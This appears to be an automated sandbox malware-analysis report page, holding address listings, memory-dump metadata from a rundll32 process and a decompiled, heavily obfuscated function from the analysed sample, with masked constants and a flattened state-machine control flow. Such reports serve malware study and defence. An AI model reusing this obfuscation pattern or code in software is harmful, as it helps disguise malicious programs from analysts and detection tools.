                                                                                                                      0x00362ff9
                                                                                                                      0x00000000
                                                                                                                      0x00362ff9
                                                                                                                      0x00362fbb
                                                                                                                      0x00362fc1
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00362fc7
                                                                                                                      0x00000000
                                                                                                                      0x00362fc7
                                                                                                                      0x00362dca
                                                                                                                      0x00362f77
                                                                                                                      0x00362f7c
                                                                                                                      0x00362f83
                                                                                                                      0x00000000
                                                                                                                      0x00362f83
                                                                                                                      0x00362dd0
                                                                                                                      0x00362dd6
                                                                                                                      0x00362ec3
                                                                                                                      0x00362ec9
                                                                                                                      0x00362f5d
                                                                                                                      0x00362f62
                                                                                                                      0x00000000
                                                                                                                      0x00362f62
                                                                                                                      0x00362ecf
                                                                                                                      0x00362ed5
                                                                                                                      0x00362f3c
                                                                                                                      0x00362f41
                                                                                                                      0x00362f48
                                                                                                                      0x00000000
                                                                                                                      0x00362f48
                                                                                                                      0x00362ed7
                                                                                                                      0x00362edd
                                                                                                                      0x00362f10
                                                                                                                      0x00362f1c
                                                                                                                      0x00362f25
                                                                                                                      0x00362f2d
                                                                                                                      0x00000000
                                                                                                                      0x00362f2d
                                                                                                                      0x00362edf
                                                                                                                      0x00362ee5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00362ef2
                                                                                                                      0x00362ef7
                                                                                                                      0x00362ef9
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00362eff
                                                                                                                      0x00000000
                                                                                                                      0x00362eff
                                                                                                                      0x00362ddc
                                                                                                                      0x00362e73
                                                                                                                      0x00362e9d
                                                                                                                      0x00362ea4
                                                                                                                      0x00362ea9
                                                                                                                      0x00362eb0
                                                                                                                      0x00362eb8
                                                                                                                      0x00000000
                                                                                                                      0x00362eb8
                                                                                                                      0x00362de8
                                                                                                                      0x00362e50
                                                                                                                      0x00362e57
                                                                                                                      0x00362e59
                                                                                                                      0x00000000
                                                                                                                      0x00362e59
                                                                                                                      0x00362df0
                                                                                                                      0x00362e34
                                                                                                                      0x00362e3d
                                                                                                                      0x00362e45
                                                                                                                      0x00000000
                                                                                                                      0x00362e45
                                                                                                                      0x00362df8
                                                                                                                      0x00363657
                                                                                                                      0x00000000
                                                                                                                      0x00363657
                                                                                                                      0x00362e04
                                                                                                                      0x00000000
                                                                                                                      0x00362e0a
                                                                                                                      0x00362e0a
                                                                                                                      0x00362e20
                                                                                                                      0x00000000
                                                                                                                      0x00362e26
                                                                                                                      0x00362e04
                                                                                                                      0x00363212
                                                                                                                      0x00363218
                                                                                                                      0x003634f8
                                                                                                                      0x003634fe
                                                                                                                      0x003635b6
                                                                                                                      0x003635bc
                                                                                                                      0x0036360e
                                                                                                                      0x00363634
                                                                                                                      0x0036363d
                                                                                                                      0x00000000
                                                                                                                      0x0036363d
                                                                                                                      0x003635be
                                                                                                                      0x003635c4
                                                                                                                      0x003635f4
                                                                                                                      0x003635f9
                                                                                                                      0x003635fb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003635fd
                                                                                                                      0x00000000
                                                                                                                      0x003635fd
                                                                                                                      0x003635c6
                                                                                                                      0x003635cc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003635ce
                                                                                                                      0x003635d5
                                                                                                                      0x003635da
                                                                                                                      0x00000000
                                                                                                                      0x003635da
                                                                                                                      0x00363504
                                                                                                                      0x0036359f
                                                                                                                      0x003635a4
                                                                                                                      0x003635a6
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003635ac
                                                                                                                      0x00000000
                                                                                                                      0x003635ac
                                                                                                                      0x0036350a
                                                                                                                      0x00363510
                                                                                                                      0x00363589
                                                                                                                      0x0036358e
                                                                                                                      0x00000000
                                                                                                                      0x0036358e
                                                                                                                      0x00363512
                                                                                                                      0x00363518
                                                                                                                      0x00363573
                                                                                                                      0x00363578
                                                                                                                      0x00000000
                                                                                                                      0x00363578
                                                                                                                      0x0036351a
                                                                                                                      0x00363520
                                                                                                                      0x00363556
                                                                                                                      0x0036355b
                                                                                                                      0x00000000
                                                                                                                      0x0036355b
                                                                                                                      0x00363522
                                                                                                                      0x00363528
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00363539
                                                                                                                      0x0036353e
                                                                                                                      0x00000000
                                                                                                                      0x0036353e
                                                                                                                      0x0036321e
                                                                                                                      0x003634c3
                                                                                                                      0x003634d8
                                                                                                                      0x003634df
                                                                                                                      0x003634e4
                                                                                                                      0x003634e7
                                                                                                                      0x003634ee
                                                                                                                      0x00000000
                                                                                                                      0x003634ee
                                                                                                                      0x00363224
                                                                                                                      0x0036322a
                                                                                                                      0x0036333d
                                                                                                                      0x00363343
                                                                                                                      0x0036349f
                                                                                                                      0x003634a4
                                                                                                                      0x00000000
                                                                                                                      0x003634a4
                                                                                                                      0x00363349
                                                                                                                      0x0036334f
                                                                                                                      0x0036344b
                                                                                                                      0x00363450
                                                                                                                      0x00363452
                                                                                                                      0x00363475
                                                                                                                      0x0036347e
                                                                                                                      0x00363486
                                                                                                                      0x00000000
                                                                                                                      0x00363486
                                                                                                                      0x00363458
                                                                                                                      0x00363461
                                                                                                                      0x00363463
                                                                                                                      0x00000000
                                                                                                                      0x00363463
                                                                                                                      0x00363355
                                                                                                                      0x0036335b
                                                                                                                      0x00363665
                                                                                                                      0x00000000
                                                                                                                      0x00363665
                                                                                                                      0x00363361
                                                                                                                      0x00363367
                                                                                                                      0x0036339c
                                                                                                                      0x003633cb
                                                                                                                      0x003633ec
                                                                                                                      0x003633f8
                                                                                                                      0x00363412
                                                                                                                      0x0036341c
                                                                                                                      0x00363430
                                                                                                                      0x00363437
                                                                                                                      0x0036343c
                                                                                                                      0x0036343c
                                                                                                                      0x00000000
                                                                                                                      0x00363367
                                                                                                                      0x00363230
                                                                                                                      0x0036332e
                                                                                                                      0x00363333
                                                                                                                      0x00000000
                                                                                                                      0x00363333
                                                                                                                      0x00363236
                                                                                                                      0x0036323c
                                                                                                                      0x00363314
                                                                                                                      0x00363319
                                                                                                                      0x00363320
                                                                                                                      0x00000000
                                                                                                                      0x00363320
                                                                                                                      0x00363242
                                                                                                                      0x00363248
                                                                                                                      0x003632f6
                                                                                                                      0x003632fb
                                                                                                                      0x003632fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00363303
                                                                                                                      0x00000000
                                                                                                                      0x00363303
                                                                                                                      0x0036324e
                                                                                                                      0x00363254
                                                                                                                      0x003632d1
                                                                                                                      0x003632db
                                                                                                                      0x003632e3
                                                                                                                      0x003632e4
                                                                                                                      0x00000000
                                                                                                                      0x003632e4
                                                                                                                      0x00363256
                                                                                                                      0x0036325c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00363262
                                                                                                                      0x00363266
                                                                                                                      0x003632ad
                                                                                                                      0x003632ad
                                                                                                                      0x00000000
                                                                                                                      0x003632ad
                                                                                                                      0x0036328a
                                                                                                                      0x00363290
                                                                                                                      0x00363291
                                                                                                                      0x00363295
                                                                                                                      0x003632a8
                                                                                                                      0x00000000
                                                                                                                      0x003632a8
                                                                                                                      0x00363297
                                                                                                                      0x00000000
                                                                                                                      0x00363642
                                                                                                                      0x00363642
                                                                                                                      0x00363642
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: kJ$*k$/;$7Mv?$@`ST$Mg$N&>$Nv$RiW$XgI8/$Y$[@M$[TA$``$fyI$l$!CG$I8/$M<$d$t}$z
                                                                                                                      • API String ID: 0-363835068
                                                                                                                      • Opcode ID: d34bb7920d174213af1280e9c052c8a452b22bc54cc27e895c4224b6d00294bb
                                                                                                                      • Instruction ID: 4ffd84a56d5b40d7044ca73b329052d32887273116c4a8a68ec7843ae9794914
                                                                                                                      • Opcode Fuzzy Hash: d34bb7920d174213af1280e9c052c8a452b22bc54cc27e895c4224b6d00294bb
                                                                                                                      • Instruction Fuzzy Hash: A9C222719093818BD3B9CF25C58ABCBBBE1BBC5314F11891DE5D99A260DBB09948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00357BCA Relevance: 24.4, Strings: 19, Instructions: 694COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E00357BCA(signed int __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _t784;
				signed int _t787;
				signed int _t791;
				void* _t797;
				signed int _t807;
				signed int _t808;
				void* _t827;
				signed int* _t829;
				signed int _t833;
				intOrPtr _t841;
				void* _t884;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				signed int _t907;
				signed int _t908;
				signed int _t909;
				signed int _t910;
				signed int _t911;
				signed int _t912;
				signed int _t914;
				signed int _t919;
				signed int* _t923;
				void* _t925;

				_push(_a40);
				_push(_a36);
				_push(_a32);
				_t829 = _a24;
				_push(_a28);
				_v16 = __edx;
				_push(_t829);
				_push(_a20);
				_v12 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4 & 0x0000ffff);
				_push(__edx);
				_push(__ecx);
				E0034CF25(_a4 & 0x0000ffff);
				_v4 = _v4 & 0x00000000;
				_v8 = 0x5b6770;
				_t923 =  &(( &_v296)[0xc]);
				_v296 = 0xae8f26;
				_v24 = 0;
				_t827 = 0;
				_t914 = 0x83eeb0d;
				_t899 = 0x66;
				_v296 = _v296 * 0x77;
				_v296 = _v296 + 0xffff6317;
				_v296 = _v296 | 0x51a667a9;
				_v296 = _v296 ^ 0x51a7efe9;
				_v220 = 0x22f2e2;
				_v220 = _v220 + 0xffff44aa;
				_v220 = _v220 / _t899;
				_t900 = 0x6e;
				_v220 = _v220 / _t900;
				_v220 = _v220 ^ 0x000000d4;
				_v180 = 0x3b651;
				_v180 = _v180 << 0xd;
				_v180 = _v180 >> 7;
				_v180 = _v180 ^ 0x00ed9488;
				_v100 = 0xe67bf2;
				_v100 = _v100 + 0x555e;
				_v100 = _v100 ^ 0x00e65150;
				_v120 = 0x8bcc28;
				_v120 = _v120 + 0xffffc7f8;
				_v120 = _v120 ^ 0x008bd420;
				_v216 = 0x57910f;
				_v216 = _v216 ^ 0xab75fa15;
				_v216 = _v216 ^ 0x4a558bb8;
				_v216 = _v216 << 0x10;
				_v216 = _v216 ^ 0xe0e20000;
				_v108 = 0xde84ad;
				_v108 = _v108 + 0xffffece5;
				_v108 = _v108 ^ 0x00da7192;
				_v124 = 0x7a6f99;
				_v124 = _v124 + 0x7c9;
				_v124 = _v124 << 0x10;
				_v124 = _v124 ^ 0x73620000;
				_v212 = 0x24738c;
				_v212 = _v212 + 0xffff84c3;
				_v212 = _v212 ^ 0xe5eb5ff0;
				_v212 = _v212 * 0x5c;
				_v212 = _v212 ^ 0x941448a4;
				_v60 = 0x198952;
				_v60 = _v60 + 0x4ddc;
				_v60 = _v60 ^ 0x0019d52e;
				_v48 = 0xba80a;
				_v48 = _v48 + 0x1f7d;
				_v48 = _v48 ^ 0x000bc687;
				_v40 = 0x36c14f;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xec14f000;
				_v72 = 0x4ddbf0;
				_v72 = _v72 + 0xffff1656;
				_v72 = _v72 ^ 0x004cf246;
				_v44 = 0x551f62;
				_v44 = _v44 ^ 0x64841b78;
				_v44 = _v44 ^ 0x64d1045b;
				_v152 = 0xb013f0;
				_t901 = 0x18;
				_v152 = _v152 * 0x52;
				_v152 = _v152 ^ 0xa7d20536;
				_v152 = _v152 ^ 0x9fb467c9;
				_v168 = 0xdb80e;
				_v168 = _v168 << 0xc;
				_v168 = _v168 + 0x66d3;
				_v168 = _v168 ^ 0xdb8146cc;
				_v116 = 0x5fff40;
				_v116 = _v116 + 0xac16;
				_v116 = _v116 ^ 0x0060ab55;
				_v28 = 0x8c1e54;
				_v28 = _v28 ^ 0x40badf76;
				_v28 = _v28 ^ 0x4036c022;
				_v296 = 0x412245;
				_v296 = _v296 / _t901;
				_v296 = _v296 + 0x2cd;
				_v296 = _v296 >> 0xf;
				_v296 = _v296 ^ 0x00000af3;
				_v296 = 0xa8f395;
				_t902 = 0x4e;
				_v296 = _v296 / _t902;
				_v296 = _v296 + 0x6ac4;
				_v296 = _v296 << 6;
				_v296 = _v296 ^ 0x00ac1221;
				_v296 = 0xd124a6;
				_t903 = 7;
				_v296 = _v296 / _t903;
				_v296 = _v296 ^ 0x9d1dae1f;
				_v296 = _v296 | 0xe011ad48;
				_v296 = _v296 ^ 0xfd13ad6e;
				_v296 = 0xfabeb9;
				_v296 = _v296 >> 3;
				_v296 = _v296 + 0xfffff1c8;
				_t904 = 0x7d;
				_v296 = _v296 / _t904;
				_v296 = _v296 ^ 0x000314ef;
				_v296 = 0x1fa60b;
				_v296 = _v296 * 0x75;
				_v296 = _v296 >> 0xd;
				_v296 = _v296 + 0x5a08;
				_v296 = _v296 ^ 0x000a0276;
				_v292 = 0xde324a;
				_v292 = _v292 ^ 0x385f234d;
				_v292 = _v292 ^ 0x83f834b0;
				_v292 = _v292 ^ 0xbb7de3fa;
				_v288 = 0x3fe2ee;
				_t208 =  &_v288; // 0x3fe2ee
				_t905 = 0x7a;
				_v288 =  *_t208 / _t905;
				_v288 = _v288 ^ 0x0006d348;
				_v288 = 0x668cef;
				_v288 = _v288 << 1;
				_v288 = _v288 ^ 0x00ccb692;
				_v296 = 0x30a71d;
				_t906 = 0x6a;
				_v296 = _v296 * 0x35;
				_v296 = _v296 + 0xfc26;
				_v296 = _v296 + 0xffffafb1;
				_v296 = _v296 ^ 0x0a154a10;
				_v292 = 0x29409b;
				_v292 = _v292 << 4;
				_v292 = _v292 + 0x774;
				_v292 = _v292 ^ 0x029bb852;
				_v292 = 0xc87f9a;
				_v292 = _v292 >> 8;
				_v292 = _v292 >> 0xe;
				_v292 = _v292 ^ 0x00086377;
				_v292 = 0x96b752;
				_v292 = _v292 + 0x721a;
				_v292 = _v292 * 0x33;
				_v292 = _v292 ^ 0x1e11edab;
				_v292 = 0x9caff;
				_v292 = _v292 | 0x3ce1fe14;
				_v292 = _v292 ^ 0x920c3820;
				_v292 = _v292 ^ 0xaeed4fa4;
				_v268 = 0x625e2a;
				_v268 = _v268 + 0xa90c;
				_v268 = _v268 << 5;
				_v268 = _v268 + 0xdce3;
				_v268 = _v268 ^ 0x0c65276a;
				_v276 = 0x811ec0;
				_v276 = _v276 << 6;
				_v276 = _v276 * 0x18;
				_v276 = _v276 | 0xc27c5ff7;
				_v276 = _v276 ^ 0xc6f6c0fc;
				_v80 = 0xbf5549;
				_v80 = _v80 + 0xd976;
				_v80 = _v80 ^ 0x00c51c7a;
				_v88 = 0xc74c4b;
				_v88 = _v88 << 0xf;
				_v88 = _v88 ^ 0xa6283482;
				_v164 = 0x7a7277;
				_t287 =  &_v164; // 0x7a7277
				_v164 =  *_t287 * 0x2a;
				_t289 =  &_v164; // 0x7a7277
				_v164 =  *_t289 * 0x14;
				_v164 = _v164 ^ 0x91c2b6e3;
				_v172 = 0x8c5cd0;
				_v172 = _v172 / _t906;
				_v172 = _v172 + 0xffffaf11;
				_v172 = _v172 ^ 0x0000520f;
				_v208 = 0x96f19c;
				_v208 = _v208 >> 0xf;
				_v208 = _v208 ^ 0xf87e01d8;
				_v208 = _v208 ^ 0xf879a426;
				_v64 = 0x5acacd;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x0b5bfe72;
				_v248 = 0xed9818;
				_v248 = _v248 + 0xffff852e;
				_v248 = _v248 + 0x2b61;
				_v248 = _v248 + 0xffff5032;
				_v248 = _v248 ^ 0x00eca9ae;
				_v196 = 0xd8fc83;
				_v196 = _v196 + 0xffffe6c0;
				_v196 = _v196 << 7;
				_v196 = _v196 ^ 0x6c795a10;
				_v104 = 0xa57136;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0xa57ba4e8;
				_v112 = 0x619c13;
				_t907 = 0x35;
				_v112 = _v112 * 0x46;
				_v112 = _v112 ^ 0x1ab16c90;
				_v284 = 0x3b2abb;
				_v284 = _v284 * 0x43;
				_v284 = _v284 << 0x10;
				_v284 = _v284 << 3;
				_v284 = _v284 ^ 0x77883a24;
				_v204 = 0xef756c;
				_v204 = _v204 | 0xa0746111;
				_v204 = _v204 ^ 0x0b05d0bc;
				_v204 = _v204 ^ 0xabfd0224;
				_v144 = 0x44b7c0;
				_v144 = _v144 << 6;
				_v144 = _v144 + 0x629;
				_v144 = _v144 ^ 0x1122cbf1;
				_v228 = 0x31841a;
				_v228 = _v228 * 0x38;
				_v228 = _v228 ^ 0x4159fb72;
				_v228 = _v228 + 0x624a;
				_v228 = _v228 ^ 0x4b8ee7c8;
				_v232 = 0xc15230;
				_v232 = _v232 ^ 0x2fe872e1;
				_v232 = _v232 >> 0xe;
				_v232 = _v232 + 0xc85e;
				_v232 = _v232 ^ 0x00073260;
				_v200 = 0xd055c7;
				_v200 = _v200 << 0xe;
				_v200 = _v200 + 0x1578;
				_v200 = _v200 ^ 0x157facd3;
				_v132 = 0xe0a83f;
				_v132 = _v132 * 0x7b;
				_v132 = _v132 >> 0xd;
				_v132 = _v132 ^ 0x000704ed;
				_v240 = 0x8432d;
				_v240 = _v240 | 0xed632ad0;
				_v240 = _v240 ^ 0x6858c4b6;
				_v240 = _v240 + 0xfdcb;
				_v240 = _v240 ^ 0x85392506;
				_v192 = 0x8324f8;
				_v192 = _v192 * 0x5b;
				_v192 = _v192 * 0x35;
				_v192 = _v192 ^ 0xa6bebbcd;
				_v272 = 0x14de64;
				_v272 = _v272 | 0x750df782;
				_v272 = _v272 ^ 0x336a958a;
				_v272 = _v272 + 0xffff8f03;
				_v272 = _v272 ^ 0x467f1cdb;
				_v52 = 0x5532de;
				_v52 = _v52 >> 6;
				_v52 = _v52 ^ 0x00006622;
				_v160 = 0xce031d;
				_v160 = _v160 | 0xfbc8b092;
				_v160 = _v160 * 0x6d;
				_v160 = _v160 ^ 0x3708e9e0;
				_v36 = 0x5242dc;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x000cba3f;
				_v92 = 0x339fd7;
				_v92 = _v92 + 0xa0d7;
				_v92 = _v92 ^ 0x00306e5b;
				_v128 = 0xd7d7e5;
				_v128 = _v128 * 0x70;
				_v128 = _v128 << 0xe;
				_v128 = _v128 ^ 0x9d0cda42;
				_v264 = 0x31382b;
				_v264 = _v264 / _t907;
				_t908 = 0x45;
				_v264 = _v264 * 0x6c;
				_v264 = _v264 * 0x28;
				_v264 = _v264 ^ 0x0fadceb8;
				_v184 = 0x6ad0e5;
				_v184 = _v184 / _t908;
				_t909 = 0x32;
				_v184 = _v184 * 0x5e;
				_v184 = _v184 ^ 0x009cabd8;
				_v84 = 0x5866f1;
				_v84 = _v84 / _t909;
				_v84 = _v84 ^ 0x000cf4a6;
				_v256 = 0xa194b;
				_v256 = _v256 ^ 0x94dec7ad;
				_t910 = 0x46;
				_v256 = _v256 / _t910;
				_v256 = _v256 >> 0x10;
				_v256 = _v256 ^ 0x000f9e72;
				_v76 = 0x8e9e60;
				_v76 = _v76 + 0xffff51c3;
				_v76 = _v76 ^ 0x0088247f;
				_v224 = 0x83ac61;
				_t911 = 0x3d;
				_v224 = _v224 * 0x1d;
				_v224 = _v224 << 0xc;
				_v224 = _v224 | 0x2dac99f4;
				_v224 = _v224 ^ 0xade893a0;
				_v32 = 0x13495a;
				_v32 = _v32 + 0x5cab;
				_v32 = _v32 ^ 0x001eeb0b;
				_v136 = 0x5c94f5;
				_v136 = _v136 + 0xffff9353;
				_v136 = _v136 * 0x44;
				_v136 = _v136 ^ 0x187702f3;
				_v176 = 0x8546fa;
				_v176 = _v176 ^ 0x1d3e4f45;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xdbb17ead;
				_v56 = 0x621504;
				_v56 = _v56 + 0x6ed1;
				_v56 = _v56 ^ 0x006a4e76;
				_v244 = 0x9c5408;
				_v244 = _v244 | 0xf9568eed;
				_v244 = _v244 + 0x5010;
				_v244 = _v244 / _t911;
				_v244 = _v244 ^ 0x041668c2;
				_v252 = 0xb42276;
				_v252 = _v252 + 0xa961;
				_v252 = _v252 + 0xdc70;
				_v252 = _v252 ^ 0x05685821;
				_v252 = _v252 ^ 0x05d7e4aa;
				_v260 = 0xd51767;
				_v260 = _v260 * 0x31;
				_v260 = _v260 << 0xc;
				_v260 = _v260 << 0xf;
				_v260 = _v260 ^ 0xb80dad1b;
				_v280 = 0xeb0bae;
				_v280 = _v280 | 0x0e7dba98;
				_v280 = _v280 << 6;
				_t912 = 0x26;
				_v280 = _v280 / _t912;
				_v280 = _v280 ^ 0x050e5033;
				_v188 = 0x4bf18;
				_v188 = _v188 * 0x2e;
				_v188 = _v188 | 0xf176dffe;
				_v188 = _v188 ^ 0xf1f57857;
				_v96 = 0x6c4fa9;
				_v96 = _v96 + 0x1fcf;
				_v96 = _v96 ^ 0x00693444;
				_v148 = 0xfd06aa;
				_v148 = _v148 >> 1;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xe83e1d17;
				_v156 = 0xd0b75a;
				_v156 = _v156 + 0xffff0c56;
				_v156 = _v156 * 0x3c;
				_v156 = _v156 ^ 0x30b9846f;
				_v288 = 0xd0c6e5;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 ^ 0x0000ba9d;
				_v292 = 0x631535;
				_v292 = _v292 >> 8;
				_v292 = _v292 * 0x1e;
				_v292 = _v292 ^ 0x000d3f85;
				_v296 = 0x662a0d;
				_v296 = _v296 + 0x95ba;
				_v296 = _v296 >> 7;
				_v296 = _v296 ^ 0xe8c154cb;
				_v296 = _v296 ^ 0xe8c95b3b;
				_v140 = 0x555820;
				_v140 = _v140 << 4;
				_v140 = _v140 | 0xc7d2a78c;
				_v140 = _v140 ^ 0xc7df0fda;
				_t913 = _v20;
				_t921 = _v20;
				while(1) {
					L1:
					while(1) {
						_t784 = _v236;
						while(1) {
							L3:
							_t925 = _t914 - 0x83eeb0d;
							if(_t925 <= 0) {
								break;
							}
							__eflags = _t914 - 0x969dc48;
							if(_t914 == 0x969dc48) {
								E00360411(_t784, _v148, _v156, _v288);
								_t914 = 0x7ec14ff;
								L40:
								_t829 = _a24;
								_t884 = 0x3d0a345;
								L41:
								__eflags = _t914 - 0xa326727;
								if(__eflags == 0) {
									L11:
									return _t827;
								}
								_t784 = _v236;
								continue;
							}
							__eflags = _t914 - 0x9d261fa;
							if(_t914 == 0x9d261fa) {
								_t833 =  *_t829;
								__eflags = _t833;
								if(_t833 == 0) {
									_t787 = 0;
									__eflags = 0;
								} else {
									_t787 = _a24[1];
								}
								E0035BD01(_v56, _t913, _t833, _v244, _v252, _t787, _v260, _a20);
								_t923 =  &(_t923[7]);
								asm("sbb esi, esi");
								_t914 = (_t914 & 0xf886a69e) + 0xe7d57af;
								L13:
								_t829 = _a24;
								goto L1;
							}
							__eflags = _t914 - 0xd1f742e;
							if(_t914 == 0xd1f742e) {
								_push(_t829);
								_t791 = E003590DB(_v72, _t829, _v268, _t829, _v276, _v80, _v88);
								_t921 = _t791;
								__eflags = _t791;
								_t914 =  !=  ? 0x266034b : 0xa326727;
								E003468DE(_v164, _v172, _v208, _v64, 0);
								_t923 =  &(_t923[0xa]);
								goto L40;
							}
							__eflags = _t914 - 0xe7d57af;
							if(_t914 == 0xe7d57af) {
								_t703 =  &_v96; // 0x693444
								E00360411(_t913, _v280, _v188,  *_t703);
								L33:
								_t914 = 0x969dc48;
								goto L13;
							}
							__eflags = _t914 - 0xef78d61;
							if(__eflags != 0) {
								goto L41;
							}
							_t914 = 0xd1f742e;
						}
						if(_t925 == 0) {
							_t914 = 0xef78d61;
							goto L3;
						}
						if(_t914 == 0xb94cb2) {
							__eflags = E00360867(_t913, _a28);
							_t914 = 0xe7d57af;
							_t797 = 1;
							_t827 =  !=  ? _t797 : _t827;
							goto L13;
						}
						if(_t914 == 0x266034b) {
							_t695 =  &_v112; // 0x306e5b
							_t784 = E003500A0(_t921, _t829, _t829, _v248, _v196, _t829, _v104, _a36,  *_t695, _v284, _v204, _v116, _v144, _a4);
							_t829 = _a24;
							_t923 =  &(_t923[0xd]);
							__eflags = _t784;
							_v236 = _t784;
							_t884 = 0x3d0a345;
							_t914 =  !=  ? 0x3d0a345 : 0x7ec14ff;
							goto L3;
						}
						if(_t914 == _t884) {
							__eflags =  *_t829;
							if(__eflags == 0) {
								_t841 = _v24;
							} else {
								_push(_v132);
								_push(_v200);
								_push(0x3412fc);
								_t841 = E0034AB66(_v228, _v232, __eflags);
								_t923 =  &(_t923[3]);
								_v24 = _t841;
							}
							_t657 =  &_v100; // 0xe65150
							_t807 = _v40 | _v48 | _v60 | _v212 | _v124 | _v108 | _v216 | _v120 |  *_t657;
							_t919 = _v12 & 1;
							__eflags = _t919;
							if(_t919 != 0) {
								__eflags = _t807;
							}
							_push(_t841);
							_t808 = E00360349(_t841, _v240, _v16, _t841, _t841, _v192, _v272, _t807, _v236, _t841, _v52, _v160);
							_t913 = _t808;
							E0034AE03(_v36, _v92, _v128, _v24);
							_t923 =  &(_t923[0xd]);
							__eflags = _t808;
							if(__eflags == 0) {
								goto L33;
							} else {
								_v68 = 1;
								E0034B6D1(_v44, _v264, _v184, 4, _v84,  &_v68, _t913);
								_t923 =  &(_t923[5]);
								__eflags = _t919;
								if(__eflags != 0) {
									E003475A5(_t913, _v256, _v152, _v76, _v224,  &_v68,  &_v20);
									_t682 =  &_v68;
									 *_t682 = _v68 | _v28;
									__eflags =  *_t682;
									E0034B6D1(_v168, _v32, _v136, _v20, _v176,  &_v68, _t913);
									_t923 =  &(_t923[0xa]);
								}
								_t914 = 0x9d261fa;
								goto L13;
							}
						}
						if(_t914 == 0x703fe4d) {
							__eflags = E003484B8(_t913, _v220, __eflags) - _v180;
							_t914 =  ==  ? 0xb94cb2 : 0xe7d57af;
							goto L13;
						}
						if(_t914 != 0x7ec14ff) {
							goto L41;
						}
						E00360411(_t921, _v292, _v296, _v140);
						goto L11;
					}
				}
			}










































































































                                                                                                                      0x00357bd4
                                                                                                                      0x00357be4
                                                                                                                      0x00357bf0
                                                                                                                      0x00357bf7
                                                                                                                      0x00357bfe
                                                                                                                      0x00357c05
                                                                                                                      0x00357c0c
                                                                                                                      0x00357c0d
                                                                                                                      0x00357c14
                                                                                                                      0x00357c1b
                                                                                                                      0x00357c22
                                                                                                                      0x00357c29
                                                                                                                      0x00357c30
                                                                                                                      0x00357c31
                                                                                                                      0x00357c32
                                                                                                                      0x00357c33
                                                                                                                      0x00357c38
                                                                                                                      0x00357c42
                                                                                                                      0x00357c4d
                                                                                                                      0x00357c50
                                                                                                                      0x00357c5a
                                                                                                                      0x00357c61
                                                                                                                      0x00357c68
                                                                                                                      0x00357c6f
                                                                                                                      0x00357c72
                                                                                                                      0x00357c76
                                                                                                                      0x00357c7e
                                                                                                                      0x00357c86
                                                                                                                      0x00357c8e
                                                                                                                      0x00357c96
                                                                                                                      0x00357ca6
                                                                                                                      0x00357cae
                                                                                                                      0x00357cb1
                                                                                                                      0x00357cb5
                                                                                                                      0x00357cbd
                                                                                                                      0x00357cc8
                                                                                                                      0x00357cd0
                                                                                                                      0x00357cd8
                                                                                                                      0x00357ce3
                                                                                                                      0x00357cee
                                                                                                                      0x00357cf9
                                                                                                                      0x00357d04
                                                                                                                      0x00357d0f
                                                                                                                      0x00357d1a
                                                                                                                      0x00357d25
                                                                                                                      0x00357d2d
                                                                                                                      0x00357d35
                                                                                                                      0x00357d3d
